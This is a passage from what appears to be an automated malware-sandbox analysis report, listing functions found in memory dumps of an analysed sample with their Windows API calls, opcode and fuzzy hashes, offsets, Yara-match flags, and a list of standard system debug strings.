                                                            • API ID: Close
                                                            • String ID:
                                                            • API String ID: 3535843008-0
                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction ID: 0dc9f22d5c27d53195c94636616ada7cfa034b97aaaac316e68f1425fba82bab
                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                            • Instruction Fuzzy Hash: 36D01776200214ABD710EB98CC89FA77BADEF48760F154499BA5CAB242C530FA008AE0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 4ffd96fee24d04069b151c959e617c910af7e2fe75e9f2b31216d21333712ac8
                                                            • Instruction ID: ebef659efd0771cf66fb05ba74d182c49c2acd216f30c3acd5ee416931f047c6
                                                            • Opcode Fuzzy Hash: 4ffd96fee24d04069b151c959e617c910af7e2fe75e9f2b31216d21333712ac8
                                                            • Instruction Fuzzy Hash: EA900261242151967545B19944045074046A7E0285791C122A1405954C85A6E856E661
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6b67bfe5e40013223c691c3ac2127716b4ac04e22731e65937562f0a163ed338
                                                            • Instruction ID: e10fe2e7bcca2c4bbba3ec83a110672cc5af0f52f982278cd2df0ca531ffc957
                                                            • Opcode Fuzzy Hash: 6b67bfe5e40013223c691c3ac2127716b4ac04e22731e65937562f0a163ed338
                                                            • Instruction Fuzzy Hash: 9F90027120111457F11161994504707004997D0285F91C522A041555CD96D6D952B161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1c1e1d720702476365c36ac86a873ff9a77b701615adfa9b4271c5385ec01626
                                                            • Instruction ID: 0e86590dd8e633164f95ddca0a68d250975fa54ef144fd4d6df783f582fdfaff
                                                            • Opcode Fuzzy Hash: 1c1e1d720702476365c36ac86a873ff9a77b701615adfa9b4271c5385ec01626
                                                            • Instruction Fuzzy Hash: 539002A134111486F10061994414B060045D7E1345F51C125E1055558D8699DC527166
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 26d5a13e7aab9144a8b10cf32e056292e13decdb74199efe9314ce7b6f2dc059
                                                            • Instruction ID: 82e586cf7f63ffd60be020620c369fe618fab8b60bd97f7d532651135cd14160
                                                            • Opcode Fuzzy Hash: 26d5a13e7aab9144a8b10cf32e056292e13decdb74199efe9314ce7b6f2dc059
                                                            • Instruction Fuzzy Hash: CC9002A120211047610571994414616404A97E0245B51C131E1005594DC5A5D8917165
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 0122c37f420a45de5af0cff82c93a7f1f366c87ee330a4858ee6eb6944ad254b
                                                            • Instruction ID: 6e92763503320e3a0c73a46c33969db532cebed41909d6ac483254834598139c
                                                            • Opcode Fuzzy Hash: 0122c37f420a45de5af0cff82c93a7f1f366c87ee330a4858ee6eb6944ad254b
                                                            • Instruction Fuzzy Hash: 359002B120111446F14071994404746004597D0345F51C121A5055558E86D9DDD576A5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 101b01657c686848b308db6710ac2a78fc7f8455f284ffcd86695b06ad047442
                                                            • Instruction ID: 6f7a0fac1c62a467958b6c145e635adf081e78a169a01b512b10acd2060719b4
                                                            • Opcode Fuzzy Hash: 101b01657c686848b308db6710ac2a78fc7f8455f284ffcd86695b06ad047442
                                                            • Instruction Fuzzy Hash: 64900265211110472105A5990704507008697D5395351C131F1006554CD6A1D8616161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: c13aae5ef0c9ac53f758501b3e278f9d85ce0d9cf12439730d2468a9145468dd
                                                            • Instruction ID: 65dad6d396703533bddef61759520e8036b8beefc2a17e0f986890295c07c8a3
                                                            • Opcode Fuzzy Hash: c13aae5ef0c9ac53f758501b3e278f9d85ce0d9cf12439730d2468a9145468dd
                                                            • Instruction Fuzzy Hash: 4F90027120111886F10061994404B46004597E0345F51C126A0115658D8695D8517561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 2e4816d0bd02cddf093be7be8d5e9810dfc52a9356c15908620080aba6fe9a90
                                                            • Instruction ID: c56c7b3c7f643e47357815593df40dcf256cf984062205fcd36e7efc50ccc4f5
                                                            • Opcode Fuzzy Hash: 2e4816d0bd02cddf093be7be8d5e9810dfc52a9356c15908620080aba6fe9a90
                                                            • Instruction Fuzzy Hash: E490027120119846F1106199840474A004597D0345F55C521A441565CD86D5D8917161
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: a92fcc52704fe6519d0aeb6a817ab41f4bb332f5442ba4aec905eef85c8280a8
                                                            • Instruction ID: 6c507c82e151c1871681c3c9383248e6a94dda5fdcd278bf64c332879dc705ad
                                                            • Opcode Fuzzy Hash: a92fcc52704fe6519d0aeb6a817ab41f4bb332f5442ba4aec905eef85c8280a8
                                                            • Instruction Fuzzy Hash: FD90027120515886F14071994404A46005597D0349F51C121A0055698D96A5DD55B6A1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 6102cf624f754551e19a89532a8d3561b2e5e7384b2d732f65e0ba6da07d55cf
                                                            • Instruction ID: ac1b4177d558df86054c070aa064c39127a5c337431397c660db2a7637ac3fbc
                                                            • Opcode Fuzzy Hash: 6102cf624f754551e19a89532a8d3561b2e5e7384b2d732f65e0ba6da07d55cf
                                                            • Instruction Fuzzy Hash: 7390026121191086F20065A94C14B07004597D0347F51C225A0145558CC995D8616561
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: fdfa3f6835547389d99516a59336be56194b7da0967614313ebc010d69985b8a
                                                            • Instruction ID: 6a460a1d3d7c08aa0f34afa4ed97cf7a6d8ccbc197317aa63c88e477298fc701
                                                            • Opcode Fuzzy Hash: fdfa3f6835547389d99516a59336be56194b7da0967614313ebc010d69985b8a
                                                            • Instruction Fuzzy Hash: 3290027120111846F1807199440464A004597D1345F91C125A0016658DCA95DA5977E1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 3ae4395a242ddc5e64586b081bd8d5d500d6223903837c23a413a413f18cc6f3
                                                            • Instruction ID: 29ce95899c78436c513ca2932835322307928b593ca14ac011ad4ab5628d9e64
                                                            • Opcode Fuzzy Hash: 3ae4395a242ddc5e64586b081bd8d5d500d6223903837c23a413a413f18cc6f3
                                                            • Instruction Fuzzy Hash: A790026921311046F1807199540860A004597D1246F91D525A000655CCC995D8696361
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: ca34d6834a95afcc37eac36052e8d7027c6ea0f5cc16844774094671438d1c51
                                                            • Instruction ID: 06ca1e2070d919bf351b77b1405a884d862773558eafd4f500764e8698f59cdf
                                                            • Opcode Fuzzy Hash: ca34d6834a95afcc37eac36052e8d7027c6ea0f5cc16844774094671438d1c51
                                                            • Instruction Fuzzy Hash: 6590027131125446F11061998404706004597D1245F51C521A081555CD86D5D8917162
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F9710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 1dc74a02dd0fc6faf73b3b138dfe47c9254e597de346cd13694504354665456a
                                                            • Instruction ID: 55fcdba79791db87f0a13db1f0234a06f8cb914997eccdff0e958aac0c2387e1
                                                            • Opcode Fuzzy Hash: 1dc74a02dd0fc6faf73b3b138dfe47c9254e597de346cd13694504354665456a
                                                            • Instruction Fuzzy Hash: 4890027120111446F10065D95408646004597E0345F51D121A5015559EC6E5D8917171
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D58286, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D5834A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D5836B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID: (
                                                            • API String ID: 1836367815-3887548279
                                                            • Opcode ID: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
                                                            • Instruction ID: 8c0ed0275bcd0b995324427246de3c4cef985e74a40d0b0392ea08e425b9dcf8
                                                            • Opcode Fuzzy Hash: 3003fe5868c96de53218c621c9b936f38735ddac68ca54658a4cecf11195dfd8
                                                            • Instruction Fuzzy Hash: DB01D6319402287BEB20AA948C06FBE7728AF40B00F044109FE44FA2C1D6D46D0A4BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D6A060, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,02D53AF8), ref: 02D6A08D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: FreeHeap
                                                            • String ID: .z`
                                                            • API String ID: 3298025750-1441809116
                                                            • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction ID: 3c5df71bb1352584452e9a0b5d24a556b31710999666737180d7bd8063734d5d
                                                            • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                            • Instruction Fuzzy Hash: 86E012B1200208ABDB18EF99CC49EA777ADEF88750F118559BA586B241C630E9108AB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D582B3, Relevance: 3.1, APIs: 2, Instructions: 71threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D5834A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D5836B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
                                                            • Instruction ID: 698c7a5a5e3fc0ae1ac2bcc8a03fa11119dca7c280195764bc3b7896a671e3da
                                                            • Opcode Fuzzy Hash: ffebd6c5cd0b63d229a9f08d4911564446a0e5be8b8f1307e14344092a30e378
                                                            • Instruction Fuzzy Hash: D811D331940234BBEB21A6A49C06FFE7768AF01B54F050059FE44FB281E7E4AD0586F1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D582E9, Relevance: 3.1, APIs: 2, Instructions: 56threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D5834A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D5836B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
                                                            • Instruction ID: 515d6dbead188679399f9c95cd02143df00a85b5a9ee94c2653a53978fd23ee4
                                                            • Opcode Fuzzy Hash: 636eb34337e7c344e61ad9b716489d8b53c43532a0902623b9219804138c3df3
                                                            • Instruction Fuzzy Hash: 2301D431A802387BEB20A6949C02FBE772CAB41B55F190159FF44FB2C1E6D56D064BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D582F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 02D5834A
                                                            • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 02D5836B
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: MessagePostThread
                                                            • String ID:
                                                            • API String ID: 1836367815-0
                                                            • Opcode ID: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                            • Instruction ID: e1b2bcdcf6727fe4b705fb6fefd59451e50a6afb831996ed3c195bfc54e43dda
                                                            • Opcode Fuzzy Hash: c7fc2a5f69c1d358cb08d19fc6b82389f9e8c0a6b9b865c62a2b7bfc84e48788
                                                            • Instruction Fuzzy Hash: A301A231A802387BEB20A6989C06FBF776CAB40B54F050119FF44FA2C1E6D46D064AF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D6A231, Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D5F192,02D5F192,?,00000000,?,?), ref: 02D6A1F0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
                                                            • Instruction ID: 8ece4f492598a013f9b6897de9d47262ad3c18be73ef7b81c02ec8ee4333cf02
                                                            • Opcode Fuzzy Hash: 5a03e0d439bc587cf6d8f2d6a1aae73b66b7442a0b6c74102f1669eef416251d
                                                            • Instruction Fuzzy Hash: A81104741042846FDB11EFB8CC95DABBBA9EF45210B118989F8D957302C631E915CBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D6A0D0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 02D6A124
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CreateInternalProcess
                                                            • String ID:
                                                            • API String ID: 2186235152-0
                                                            • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction ID: b29a90f01393fbf19bd61518da778dc274f5e413c859145992342a34a9639625
                                                            • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                            • Instruction Fuzzy Hash: FE01AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258BA4DA7240C630E851CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D6A020, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlAllocateHeap.NTDLL(02D644F6,?,02D64C6F,02D64C6F,?,02D644F6,?,?,?,?,?,00000000,00000000,?), ref: 02D6A04D
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap
                                                            • String ID:
                                                            • API String ID: 1279760036-0
                                                            • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction ID: 6f1bd8db9d468b471b7641b2c8b619c0d06d63ca6a6b656534e65ecc643c3f87
                                                            • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                            • Instruction Fuzzy Hash: B0E012B1200208ABDB14EF99CC45EA777ADEF88654F118559BA586B241C630F9108AB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D6A1C0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,02D5F192,02D5F192,?,00000000,?,?), ref: 02D6A1F0
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: LookupPrivilegeValue
                                                            • String ID:
                                                            • API String ID: 3899507212-0
                                                            • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction ID: 513859a8e7eff4c986499931d29e85bb0b7726506ca0c7a17c409d1eab87f8cb
                                                            • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                            • Instruction Fuzzy Hash: 74E01AB12002086BDB10DF49CC85EE737ADEF88650F118155BA4C67241C930E8108BF5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 02D5F690, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetErrorMode.KERNELBASE(00008003,?,02D58CF4,?), ref: 02D5F6BB
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.917716659.0000000002D50000.00000040.00020000.sdmp, Offset: 02D50000, based on PE: false
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ErrorMode
                                                            • String ID:
                                                            • API String ID: 2340568224-0
                                                            • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                            • Instruction ID: 40f269aa1eaf243cbca24ca728d4acc26f81b6e00d998ac534a2965363a7c07e
                                                            • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                                            • Instruction Fuzzy Hash: 26D05E726903042BEA10AAA49C06F2632C99B55A04F490064F9489B3C7DA54E4108565
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 048F967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.918229446.0000000004890000.00000040.00000001.sdmp, Offset: 04890000, based on PE: true
                                                            • Associated: 00000009.00000002.918369477.00000000049AB000.00000040.00000001.sdmp Download File
                                                            • Associated: 00000009.00000002.918389183.00000000049AF000.00000040.00000001.sdmp Download File
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Opcode ID: 56ad4602d846b92fe39cf9b1d1e70317a94163407d420c13c1c29f3962c10da3
                                                            • Instruction ID: ed60a09ee73af94601897a9798b4004081be76998ae442a54d88d7045980da68
                                                            • Opcode Fuzzy Hash: 56ad4602d846b92fe39cf9b1d1e70317a94163407d420c13c1c29f3962c10da3
                                                            • Instruction Fuzzy Hash: 1AB09BB19015D5C9F711D7A14A087177A407BD0745F27C561D2024645A477CD091F5B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 0496B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0496B476
                                                            • a NULL pointer, xrefs: 0496B4E0
                                                            • The resource is owned exclusively by thread %p, xrefs: 0496B374
                                                            • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0496B484
                                                            • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0496B38F
                                                            • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0496B305
                                                            • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0496B2F3
                                                            • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0496B323
                                                            • Go determine why that thread has not released the critical section., xrefs: 0496B3C5
                                                            • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0496B47D
                                                            • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0496B2DC
                                                            • <unknown>, xrefs: 0496B27E, 0496B2D1, 0496B350, 0496B399, 0496B417, 0496B48E
                                                            • *** Resource timeout (%p) in %ws:%s, xrefs: 0496B352
                                                            • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0496B314
                                                            • read from, xrefs: 0496B4AD, 0496B4B2
                                                            • The instruction at %p referenced memory at %p., xrefs: 0496B432
                                                            • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0496B3D6
                                                            • The critical section is owned by thread %p., xrefs: 0496B3B9
                                                            • *** then kb to get the faulting stack, xrefs: 0496B51C
                                                            • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0496B39B
                                                            • *** enter .exr %p for the exception record, xrefs: 0496B4F1
                                                            • *** enter .cxr %p for the context, xrefs: 0496B50D
                                                            • *** Inpage error in %ws:%s, xrefs: 0496B418
                                                            • This failed because of error %Ix., xrefs: 0496B446
                                                            • an invalid address, %p, xrefs: 0496B4CF
